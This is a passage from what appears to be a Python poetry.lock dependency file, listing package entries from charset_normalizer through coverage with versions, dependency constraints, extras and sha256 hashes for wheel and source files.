"charset_normalizer-3.3.1-cp38-cp38-win32.whl", hash = "sha256:548eefad783ed787b38cb6f9a574bd8664468cc76d1538215d510a3cd41406cb"}, {file = "charset_normalizer-3.3.1-cp38-cp38-win_amd64.whl", hash = "sha256:45f053a0ece92c734d874861ffe6e3cc92150e32136dd59ab1fb070575189c97"}, {file = "charset_normalizer-3.3.1-cp39-cp39-macosx_10_9_universal2.whl", hash = "sha256:bc791ec3fd0c4309a753f95bb6c749ef0d8ea3aea91f07ee1cf06b7b02118f2f"}, {file = "charset_normalizer-3.3.1-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:0c8c61fb505c7dad1d251c284e712d4e0372cef3b067f7ddf82a7fa82e1e9a93"}, {file = "charset_normalizer-3.3.1-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:2c092be3885a1b7899cd85ce24acedc1034199d6fca1483fa2c3a35c86e43041"}, {file = "charset_normalizer-3.3.1-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:c2000c54c395d9e5e44c99dc7c20a64dc371f777faf8bae4919ad3e99ce5253e"}, {file = "charset_normalizer-3.3.1-cp39-cp39-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:4cb50a0335382aac15c31b61d8531bc9bb657cfd848b1d7158009472189f3d62"}, {file = "charset_normalizer-3.3.1-cp39-cp39-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:c30187840d36d0ba2893bc3271a36a517a717f9fd383a98e2697ee890a37c273"}, {file = "charset_normalizer-3.3.1-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:fe81b35c33772e56f4b6cf62cf4aedc1762ef7162a31e6ac7fe5e40d0149eb67"}, {file = "charset_normalizer-3.3.1-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:d0bf89afcbcf4d1bb2652f6580e5e55a840fdf87384f6063c4a4f0c95e378656"}, {file = "charset_normalizer-3.3.1-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:06cf46bdff72f58645434d467bf5228080801298fbba19fe268a01b4534467f5"}, {file = "charset_normalizer-3.3.1-cp39-cp39-musllinux_1_1_i686.whl", hash = "sha256:3c66df3f41abee950d6638adc7eac4730a306b022570f71dd0bd6ba53503ab57"}, {file = "charset_normalizer-3.3.1-cp39-cp39-musllinux_1_1_ppc64le.whl", hash = "sha256:cd805513198304026bd379d1d516afbf6c3c13f4382134a2c526b8b854da1c2e"}, {file = "charset_normalizer-3.3.1-cp39-cp39-musllinux_1_1_s390x.whl", hash = "sha256:9505dc359edb6a330efcd2be825fdb73ee3e628d9010597aa1aee5aa63442e97"}, {file = "charset_normalizer-3.3.1-cp39-cp39-musllinux_1_1_x86_64.whl", hash = 
"sha256:31445f38053476a0c4e6d12b047b08ced81e2c7c712e5a1ad97bc913256f91b2"}, {file = "charset_normalizer-3.3.1-cp39-cp39-win32.whl", hash = "sha256:bd28b31730f0e982ace8663d108e01199098432a30a4c410d06fe08fdb9e93f4"}, {file = "charset_normalizer-3.3.1-cp39-cp39-win_amd64.whl", hash = "sha256:555fe186da0068d3354cdf4bbcbc609b0ecae4d04c921cc13e209eece7720727"}, {file = "charset_normalizer-3.3.1-py3-none-any.whl", hash = "sha256:800561453acdecedaac137bf09cd719c7a440b6800ec182f077bb8e7025fb708"}, ] [[package]] name = "clarifai" version = "9.1.0" description = "Clarifai Python Utilities" optional = true python-versions = ">=3.7" files = [ {file = "clarifai-9.1.0-py3-none-any.whl", hash = "sha256:a22b6c34d18067eb6902111bdbd9627dc2b72b743ac50b3f3178dc7663016003"}, {file = "clarifai-9.1.0.tar.gz", hash = "sha256:f6e65fd81a810c4063f23a066ded68306423da1be0bbf61b32c5ef01214f607f"}, ] [package.dependencies] clarifai-grpc = ">=9.1.0" [[package]] name = "clarifai-grpc" version = "9.1.1" description = "Clarifai gRPC API Client" optional = true python-versions = ">=3.6" files = [ {file = "clarifai-grpc-9.1.1.tar.gz", hash = "sha256:d347b64f8d8dcf4dee1c51c5eced3c3f489e3be595ca4c8374323fdf934bae57"}, {file = "clarifai_grpc-9.1.1-py3-none-any.whl", hash = "sha256:84a49e3d4fa57937ab38fb365c535a8ae255acac4666134d188f5dbe10e865ba"}, ] [package.dependencies] googleapis-common-protos = ">=1.53.0" grpcio = ">=1.44.0" protobuf = ">=3.12" requests = ">=2.25.1" [[package]] name = "click" version = "8.1.7" description = "Composable command line interface toolkit" optional = false python-versions = ">=3.7" files = [ {file = "click-8.1.7-py3-none-any.whl", hash = "sha256:ae74fb96c20a0277a1d615f1e4d73c8414f5a98db8b799a7931d1582f3390c28"}, {file = "click-8.1.7.tar.gz", hash = "sha256:ca9853ad459e787e2192211578cc907e7594e294c7ccc834310722b41b9ca6de"}, ] [package.dependencies] colorama = {version = "*", markers = "platform_system == \"Windows\""} [[package]] name = "click-plugins" version = "1.1.1" description = "An extension module for click to enable registering CLI commands via setuptools entry-points." 
optional = true python-versions = "*" files = [ {file = "click-plugins-1.1.1.tar.gz", hash = "sha256:46ab999744a9d831159c3411bb0c79346d94a444df9a3a3742e9ed63645f264b"}, {file = "click_plugins-1.1.1-py2.py3-none-any.whl", hash = "sha256:5d262006d3222f5057fd81e1623d4443e41dcda5dc815c06b442aa3c02889fc8"}, ] [package.dependencies] click = ">=4.0" [package.extras] dev = ["coveralls", "pytest (>=3.6)", "pytest-cov", "wheel"] [[package]] name = "clickhouse-connect" version = "0.5.25" description = "ClickHouse core driver, SqlAlchemy, and Superset libraries" optional = true python-versions = "~=3.7" files = [ {file = "clickhouse-connect-0.5.25.tar.gz", hash = "sha256:98af3fff571d1069d2c6dd2f4c0feb220fe4c55bd12608e841c842582061982f"}, {file = "clickhouse_connect-0.5.25-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:7c8ec7ca17efe105211e7b1271b49e0f6c3c56846488a14a866712ce497ef5a5"}, {file = "clickhouse_connect-0.5.25-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:da4153d44461535b31f5bf25b79504ba4afa1ed1f03b50fbfc595e34b2b3d2f2"}, {file = "clickhouse_connect-0.5.25-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:0cb5ea544cbabefa99ac588e6a452be6b9e896506b306ebc7a4b073fb3237e6f"}, {file = "clickhouse_connect-0.5.25-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:0623d7086710f5c9d04327da1a791ffbf519c0f54b25e3584b6eb88f5496c06b"}, {file = "clickhouse_connect-0.5.25-cp310-cp310-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:243edb0e30fb52e1e9f137519d342e09e5b804e2e4d1b5d9eea6f90875bd8abe"}, {file = "clickhouse_connect-0.5.25-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:182d5f28a24e2d91921dff6d6fedb51f3622088f340847e46ded93c23b10d8c5"}, {file = "clickhouse_connect-0.5.25-cp310-cp310-musllinux_1_1_i686.whl", hash = "sha256:f6d4d536daf5c0730350cfe1c51dbf0379d07c8272ae288b82fe9a9c47978879"}, {file = "clickhouse_connect-0.5.25-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:8918fcd0d14b1ea7d8159a0cef815ec707ec039689f4d4db956b8f4627a48aea"}, {file = "clickhouse_connect-0.5.25-cp310-cp310-win32.whl", hash = "sha256:62819da829bdce30fac58f2266a134b50983f2a9f5808acdde70b0d59e3ed1e1"}, {file = "clickhouse_connect-0.5.25-cp310-cp310-win_amd64.whl", hash = "sha256:219501ab1180475cbb5fbe604344fd13650507e0bc2618a876f209903dd6738d"}, {file = "clickhouse_connect-0.5.25-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:ffe69f2242398845111987672552e2af76a13c0770ce00f82ce84d52f5dd5391"}, {file = "clickhouse_connect-0.5.25-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:c701cfc1ae4c9f32aefc9b331224b232b01178ec5692297a827563012b29e2bc"}, {file = "clickhouse_connect-0.5.25-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:4d8ecae52e5f4d93b7460fb66c61108b77afc28a39bdd6c31dded22865584ec3"}, {file = "clickhouse_connect-0.5.25-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:95340f5054a697b36fc9d32f34516583d9a1d4b9c6784860a7454f7d27802d4e"}, {file = "clickhouse_connect-0.5.25-cp311-cp311-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:657aa2624c532dcc465ef517880823d9c4f2732e792ff51bb306cee1abc4c6a6"}, {file = "clickhouse_connect-0.5.25-cp311-cp311-musllinux_1_1_aarch64.whl", hash = "sha256:964cae0de1badc2430927398f172da70c6f322266f8ae2509e7cf83f305a38f5"}, {file = "clickhouse_connect-0.5.25-cp311-cp311-musllinux_1_1_i686.whl", hash = 
"sha256:0cf33dcb201500cce86c9550f55e0505fa22567ce5314aca01037cf88d139b21"}, {file = "clickhouse_connect-0.5.25-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:ff5e4f2098b5363116ec99c79a8f78a81af95eb80086c3df86713dcebb47a36c"}, {file = "clickhouse_connect-0.5.25-cp311-cp311-win32.whl", hash = "sha256:4792f129593f931609e623c64627b2a6b265fc55083e121e3c4cc800ea65bbb3"}, {file = "clickhouse_connect-0.5.25-cp311-cp311-win_amd64.whl", hash = "sha256:e69421e03ac40c8a5c9f70aca110945b0a7e33843dc415f2305142db9b819941"}, {file = "clickhouse_connect-0.5.25-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:e1c285c3452564e99098cce044ef7f6e2041f70f5557022d0f07886d0c17284a"}, {file = "clickhouse_connect-0.5.25-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:f501c4f8d92625b0028f828a317beda621bbd6fd26bddada756f2971b0808618"}, {file = "clickhouse_connect-0.5.25-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:0d2bc8636e262a83f9ee8faf0de6562f463f6b431c6a543be6628006640c0065"}, {file = "clickhouse_connect-0.5.25-cp37-cp37m-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:b853b146b3557484946c93b4af22834c83ad30908850dc418dd6085b9367bf59"}, {file = "clickhouse_connect-0.5.25-cp37-cp37m-musllinux_1_1_aarch64.whl", hash = "sha256:4851bb77eba7bbf494b3ee16f71a63cb890947ceddd3d71c2cf5a6635d482987"}, {file = "clickhouse_connect-0.5.25-cp37-cp37m-musllinux_1_1_i686.whl", hash = "sha256:75884207d0e09a9018be29ebe38c0e26be8d0ba96053cc181ee85c15b4ccd18d"}, {file = "clickhouse_connect-0.5.25-cp37-cp37m-musllinux_1_1_x86_64.whl", hash = "sha256:3d435e98126754ba82e23d20154ff427117227915ee84c7fea43a8d4444daed2"}, {file = "clickhouse_connect-0.5.25-cp37-cp37m-win32.whl", hash = "sha256:d900614c8a85c635b45c30d5de37d287cd0b20e44ef1f7f4b83b392bc82696c7"}, {file = "clickhouse_connect-0.5.25-cp37-cp37m-win_amd64.whl", hash = "sha256:1c47b203278df80ebd3eccb9087194f35dd666c2d19bca8148dc70d80b94502b"}, {file = "clickhouse_connect-0.5.25-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:6d60ec792e72b26184082ec86d4a32d1503acd6725b02bcb56c2980340129837"}, {file = "clickhouse_connect-0.5.25-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:e050e67b9b2ce12ec3e7ce5c27d772e54d06dab578393c0760fd2fd8ea9eae57"}, {file = "clickhouse_connect-0.5.25-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:e78c9b398abc683f003ed5d3013f2b35d692b8d1a9f1a40dc41fc9fa29304b58"}, {file = "clickhouse_connect-0.5.25-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:805a0494c8a3f4b37f38b33bdf6daeb43ea4165c3d5916e0467a4811f7a1efc6"}, {file = "clickhouse_connect-0.5.25-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:62e2da6c3971bc3cfec3dc0430318f38d061ffbdd4eb122e616a2f1aafc6e5c9"}, {file = "clickhouse_connect-0.5.25-cp38-cp38-musllinux_1_1_aarch64.whl", hash = "sha256:b7dbccfc5a7b238c7e927fb159b95f8ab2970ca0fd4ea39c813be4d10d2799cd"}, {file = "clickhouse_connect-0.5.25-cp38-cp38-musllinux_1_1_i686.whl", hash = "sha256:6b9e4d0367f99471e865af55865fe300ccbf6e1d9fa070e1e0048c0f33d1ac2c"}, {file = "clickhouse_connect-0.5.25-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:f5bf565a45fb52c5b7e9a96913cda4012c1de1407bbab165378e32c6c946bf0d"}, {file = "clickhouse_connect-0.5.25-cp38-cp38-win32.whl", hash = "sha256:a08ead36c61ac28ce44a0f202acbd594e818be7640d6c972a33a1ebae72e6770"}, {file = "clickhouse_connect-0.5.25-cp38-cp38-win_amd64.whl", hash = 
"sha256:0db04a7433d1616f88eaa33b5c5884f7d367d087774a058712a2a6075ac1b4fb"}, {file = "clickhouse_connect-0.5.25-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:dd7ffbf42a97a4344b82b934d27749fd8296bb18b29a295c249b5d9a774ad122"}, {file = "clickhouse_connect-0.5.25-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:b51c174621c1de9ae03acd31fbd258e51a1760ae39b4c9ffbaec4a38e19e1545"}, {file = "clickhouse_connect-0.5.25-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:a59d3d84fccfb831b19a96503fcaf1f6387b49f561d38bf3549fe917a372cc68"}, {file = "clickhouse_connect-0.5.25-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:8335abab878fb166494bb9e68bb7d14a7325f96fb656d3f77d7a23668fb67a2f"}, {file = "clickhouse_connect-0.5.25-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:a0a53d30cc50350efd82ad492a5b5597dedd6b79b19cfd2fe4331eac756f4aeb"}, {file = "clickhouse_connect-0.5.25-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:234579a907e43522c08f1ab9a199d44f7177d7a3755a43669143b237daa026a1"}, {file = "clickhouse_connect-0.5.25-cp39-cp39-musllinux_1_1_i686.whl", hash = "sha256:93486291893605a0c8884db98e6306f61720fdbe4b1bed5b57cc0daa69cb18c9"}, {file = "clickhouse_connect-0.5.25-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:538025c3e10a387c0fe41b687c3421b98070a7f07d07ca88d7cc0d8aed7650f1"}, {file = "clickhouse_connect-0.5.25-cp39-cp39-win32.whl", hash = "sha256:38051bf7bd6003c0763561214530eef49dc194b062d6bf7faca708f42a5dbf63"}, {file = "clickhouse_connect-0.5.25-cp39-cp39-win_amd64.whl", hash = "sha256:3618a75a1f2c286e808b1d003ee3956bbf2a762ed36fee5f2a3e2e2096fb37ba"}, {file = "clickhouse_connect-0.5.25-pp37-pypy37_pp73-macosx_10_9_x86_64.whl", hash = "sha256:2170ba71ad154e9af1f09efd6acaf257b8c1346aeaaf57ae9cac7aa5778bff2c"}, {file = "clickhouse_connect-0.5.25-pp37-pypy37_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:c846104f4e399e50008324c6ae66c3ef45ac4137a67ccaacdd3afe7f2667b05a"}, {file = "clickhouse_connect-0.5.25-pp37-pypy37_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:697e7c6ea239666aa2695a03787e4fff0c18cb829eb50086f929cf22cc455c7a"}, {file = "clickhouse_connect-0.5.25-pp37-pypy37_pp73-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:7b093fc58104b1afe5f968394acaa9b665746564e1ed0c7d8ee5aea7a7a2331b"}, {file = "clickhouse_connect-0.5.25-pp37-pypy37_pp73-win_amd64.whl", hash = "sha256:4b80e15bff634c4d6a895316b73843f41208d9e22e7e0039e417c79ead5ec906"}, {file = "clickhouse_connect-0.5.25-pp38-pypy38_pp73-macosx_10_9_x86_64.whl", hash = "sha256:ce9cd94d0d9e022e71cd121555f07c28ad2dbda431e1caf2174ce89a9d792151"}, {file = "clickhouse_connect-0.5.25-pp38-pypy38_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:9fec43568dd0424deb9dcc74a804addd91f7119367a4ae77796c59656ba22be9"}, {file = "clickhouse_connect-0.5.25-pp38-pypy38_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:5c5bdc7895b05f0a64956b6b4a29da3882a9b805e1d9e0025a061c46791674f3"}, {file = "clickhouse_connect-0.5.25-pp38-pypy38_pp73-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:00b54674d9af736f828c438776b7f11e80aecc95a3b763971df20d1537942408"}, {file = "clickhouse_connect-0.5.25-pp38-pypy38_pp73-win_amd64.whl", hash = "sha256:401aa544255f15d6350934db59e6e0b9f1ddc866ccea41803973579725223aea"}, {file = 
"clickhouse_connect-0.5.25-pp39-pypy39_pp73-macosx_10_9_x86_64.whl", hash = "sha256:c0a91e08f8563b8710b03c4a3696ba91fa3b0e475aa964a3169f201243f45d76"}, {file = "clickhouse_connect-0.5.25-pp39-pypy39_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:af191fc8ecaa544e065257c99cd1d7f49d62c191d23adb78fd34182525ea2f8f"}, {file = "clickhouse_connect-0.5.25-pp39-pypy39_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:ef6cb5437c18e7588d6c3d7f4df6c8cdd883c30f82f8ec4f199cdcea63d189e4"}, {file = "clickhouse_connect-0.5.25-pp39-pypy39_pp73-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:d5f84058209fbab8119835d9dd475ca4c3a246263d1965f0e7c624bae020cfad"}, {file = "clickhouse_connect-0.5.25-pp39-pypy39_pp73-win_amd64.whl", hash = "sha256:b0a12c57233c85edd1a03d7bd153ef68b5392d500d8a1cf21de8cb5698c57481"}, ] [package.dependencies] certifi = "*" lz4 = "*" pytz = "*" urllib3 = ">=1.26" zstandard = "*" [package.extras] arrow = ["pyarrow"] numpy = ["numpy"] orjson = ["orjson"] pandas = ["pandas"] sqlalchemy = ["sqlalchemy (>1.3.21,<1.4)"] superset = ["apache-superset (>=1.4.1)"] [[package]] name = "cligj" version = "0.7.2" description = "Click params for commmand line interfaces to GeoJSON" optional = true python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, <4" files = [ {file = "cligj-0.7.2-py3-none-any.whl", hash = "sha256:c1ca117dbce1fe20a5809dc96f01e1c2840f6dcc939b3ddbb1111bf330ba82df"}, {file = "cligj-0.7.2.tar.gz", hash = "sha256:a4bc13d623356b373c2c27c53dbd9c68cae5d526270bfa71f6c6fa69669c6b27"}, ] [package.dependencies] click = ">=4.0" [package.extras] test = ["pytest-cov"] [[package]] name = "codespell" version = "2.2.6" description = "Codespell" optional = false python-versions = ">=3.8" files = [ {file = "codespell-2.2.6-py3-none-any.whl", hash = "sha256:9ee9a3e5df0990604013ac2a9f22fa8e57669c827124a2e961fe8a1da4cacc07"}, {file = "codespell-2.2.6.tar.gz", hash = "sha256:a8c65d8eb3faa03deabab6b3bbe798bea72e1799c7e9e955d57eca4096abcff9"}, ] [package.extras] dev = ["Pygments", "build", "chardet", "pre-commit", "pytest", "pytest-cov", "pytest-dependency", "ruff", "tomli", "twine"] hard-encoding-detection = ["chardet"] toml = ["tomli"] types = ["chardet (>=5.1.0)", "mypy", "pytest", "pytest-cov", "pytest-dependency"] [[package]] name = "cohere" version = "4.32" description = "" optional = true python-versions = ">=3.7,<4.0" files = [ {file = "cohere-4.32-py3-none-any.whl", hash = "sha256:b5ab3509a34c20d51b246e38eb64adc839c8bc131c41ed92ec3613998df9a8e0"}, {file = "cohere-4.32.tar.gz", hash = "sha256:3807747be984f211dce911c1335bd713af2ac2b70f729678381e6ff6e450e681"}, ] [package.dependencies] aiohttp = ">=3.0,<4.0" backoff = ">=2.0,<3.0" fastavro = {version = "1.8.2", markers = "python_version >= \"3.8\""} importlib_metadata = ">=6.0,<7.0" requests = ">=2.25.0,<3.0.0" urllib3 = ">=1.26,<3" [[package]] name = "colorama" version = "0.4.6" description = "Cross-platform colored terminal text." 
optional = false python-versions = "!=3.0.*,!=3.1.*,!=3.2.*,!=3.3.*,!=3.4.*,!=3.5.*,!=3.6.*,>=2.7" files = [ {file = "colorama-0.4.6-py2.py3-none-any.whl", hash = "sha256:4f1d9991f5acc0ca119f9d443620b77f9d6b33703e51011c16baf57afb285fc6"}, {file = "colorama-0.4.6.tar.gz", hash = "sha256:08695f5cb7ed6e0531a20572697297273c47b8cae5a63ffc6d6ed5c201be6e44"}, ] [[package]] name = "coloredlogs" version = "15.0.1" description = "Colored terminal output for Python's logging module" optional = true python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*, !=3.4.*" files = [ {file = "coloredlogs-15.0.1-py2.py3-none-any.whl", hash = "sha256:612ee75c546f53e92e70049c9dbfcc18c935a2b9a53b66085ce9ef6a6e5c0934"}, {file = "coloredlogs-15.0.1.tar.gz", hash = "sha256:7c991aa71a4577af2f82600d8f8f3a89f936baeaf9b50a9c197da014e5bf16b0"}, ] [package.dependencies] humanfriendly = ">=9.1" [package.extras] cron = ["capturer (>=2.4)"] [[package]] name = "comm" version = "0.1.4" description = "Jupyter Python Comm implementation, for usage in ipykernel, xeus-python etc." optional = false python-versions = ">=3.6" files = [ {file = "comm-0.1.4-py3-none-any.whl", hash = "sha256:6d52794cba11b36ed9860999cd10fd02d6b2eac177068fdd585e1e2f8a96e67a"}, {file = "comm-0.1.4.tar.gz", hash = "sha256:354e40a59c9dd6db50c5cc6b4acc887d82e9603787f83b68c01a80a923984d15"}, ] [package.dependencies] traitlets = ">=4" [package.extras] lint = ["black (>=22.6.0)", "mdformat (>0.7)", "mdformat-gfm (>=0.3.5)", "ruff (>=0.0.156)"] test = ["pytest"] typing = ["mypy (>=0.990)"] [[package]] name = "coverage" version = "7.3.2" description = "Code coverage measurement for Python" optional = false python-versions = ">=3.8" files = [ {file = "coverage-7.3.2-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:d872145f3a3231a5f20fd48500274d7df222e291d90baa2026cc5152b7ce86bf"}, {file = "coverage-7.3.2-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:310b3bb9c91ea66d59c53fa4989f57d2436e08f18fb2f421a1b0b6b8cc7fffda"}, {file = "coverage-7.3.2-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:f47d39359e2c3779c5331fc740cf4bce6d9d680a7b4b4ead97056a0ae07cb49a"}, {file = "coverage-7.3.2-cp310-cp310-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:aa72dbaf2c2068404b9870d93436e6d23addd8bbe9295f49cbca83f6e278179c"}, {file = "coverage-7.3.2-cp310-cp310-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:beaa5c1b4777f03fc63dfd2a6bd820f73f036bfb10e925fce067b00a340d0f3f"}, {file = "coverage-7.3.2-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:dbc1b46b92186cc8074fee9d9fbb97a9dd06c6cbbef391c2f59d80eabdf0faa6"}, {file = "coverage-7.3.2-cp310-cp310-musllinux_1_1_i686.whl", hash = "sha256:315a989e861031334d7bee1f9113c8770472db2ac484e5b8c3173428360a9148"}, {file = "coverage-7.3.2-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:d1bc430677773397f64a5c88cb522ea43175ff16f8bfcc89d467d974cb2274f9"}, {file = "coverage-7.3.2-cp310-cp310-win32.whl", hash = "sha256:a889ae02f43aa45032afe364c8ae84ad3c54828c2faa44f3bfcafecb5c96b02f"}, {file = "coverage-7.3.2-cp310-cp310-win_amd64.whl", hash = "sha256:c0ba320de3fb8c6ec16e0be17ee1d3d69adcda99406c43c0409cb5c41788a611"}, {file = "coverage-7.3.2-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:ac8c802fa29843a72d32ec56d0ca792ad15a302b28ca6203389afe21f8fa062c"}, {file = "coverage-7.3.2-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:89a937174104339e3a3ffcf9f446c00e3a806c28b1841c63edb2b369310fd074"}, 
{file = "coverage-7.3.2-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:e267e9e2b574a176ddb983399dec325a80dbe161f1a32715c780b5d14b5f583a"}, {file = "coverage-7.3.2-cp311-cp311-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:2443cbda35df0d35dcfb9bf8f3c02c57c1d6111169e3c85fc1fcc05e0c9f39a3"}, {file = "coverage-7.3.2-cp311-cp311-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:4175e10cc8dda0265653e8714b3174430b07c1dca8957f4966cbd6c2b1b8065a"}, {file = "coverage-7.3.2-cp311-cp311-musllinux_1_1_aarch64.whl", hash = "sha256:0cbf38419fb1a347aaf63481c00f0bdc86889d9fbf3f25109cf96c26b403fda1"}, {file = "coverage-7.3.2-cp311-cp311-musllinux_1_1_i686.whl", hash = "sha256:5c913b556a116b8d5f6ef834038ba983834d887d82187c8f73dec21049abd65c"}, {file = "coverage-7.3.2-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:1981f785239e4e39e6444c63a98da3a1db8e971cb9ceb50a945ba6296b43f312"}, {file = "coverage-7.3.2-cp311-cp311-win32.whl", hash = "sha256:43668cabd5ca8258f5954f27a3aaf78757e6acf13c17604d89648ecc0cc66640"}, {file = "coverage-7.3.2-cp311-cp311-win_amd64.whl", hash = "sha256:e10c39c0452bf6e694511c901426d6b5ac005acc0f78ff265dbe36bf81f808a2"}, {file = "coverage-7.3.2-cp312-cp312-macosx_10_9_x86_64.whl", hash = "sha256:4cbae1051ab791debecc4a5dcc4a1ff45fc27b91b9aee165c8a27514dd160836"}, {file = "coverage-7.3.2-cp312-cp312-macosx_11_0_arm64.whl", hash = "sha256:12d15ab5833a997716d76f2ac1e4b4d536814fc213c85ca72756c19e5a6b3d63"}, {file = "coverage-7.3.2-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:3c7bba973ebee5e56fe9251300c00f1579652587a9f4a5ed8404b15a0471f216"}, {file = "coverage-7.3.2-cp312-cp312-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:fe494faa90ce6381770746077243231e0b83ff3f17069d748f645617cefe19d4"}, {file = "coverage-7.3.2-cp312-cp312-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:f6e9589bd04d0461a417562649522575d8752904d35c12907d8c9dfeba588faf"}, {file = "coverage-7.3.2-cp312-cp312-musllinux_1_1_aarch64.whl", hash = "sha256:d51ac2a26f71da1b57f2dc81d0e108b6ab177e7d30e774db90675467c847bbdf"}, {file = "coverage-7.3.2-cp312-cp312-musllinux_1_1_i686.whl", hash = "sha256:99b89d9f76070237975b315b3d5f4d6956ae354a4c92ac2388a5695516e47c84"}, {file = "coverage-7.3.2-cp312-cp312-musllinux_1_1_x86_64.whl", hash = "sha256:fa28e909776dc69efb6ed975a63691bc8172b64ff357e663a1bb06ff3c9b589a"}, {file = "coverage-7.3.2-cp312-cp312-win32.whl", hash = "sha256:289fe43bf45a575e3ab10b26d7b6f2ddb9ee2dba447499f5401cfb5ecb8196bb"}, {file = "coverage-7.3.2-cp312-cp312-win_amd64.whl", hash = "sha256:7dbc3ed60e8659bc59b6b304b43ff9c3ed858da2839c78b804973f613d3e92ed"}, {file = "coverage-7.3.2-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:f94b734214ea6a36fe16e96a70d941af80ff3bfd716c141300d95ebc85339738"}, {file = "coverage-7.3.2-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:af3d828d2c1cbae52d34bdbb22fcd94d1ce715d95f1a012354a75e5913f1bda2"}, {file = "coverage-7.3.2-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:630b13e3036e13c7adc480ca42fa7afc2a5d938081d28e20903cf7fd687872e2"}, {file = "coverage-7.3.2-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:c9eacf273e885b02a0273bb3a2170f30e2d53a6d53b72dbe02d6701b5296101c"}, {file = 
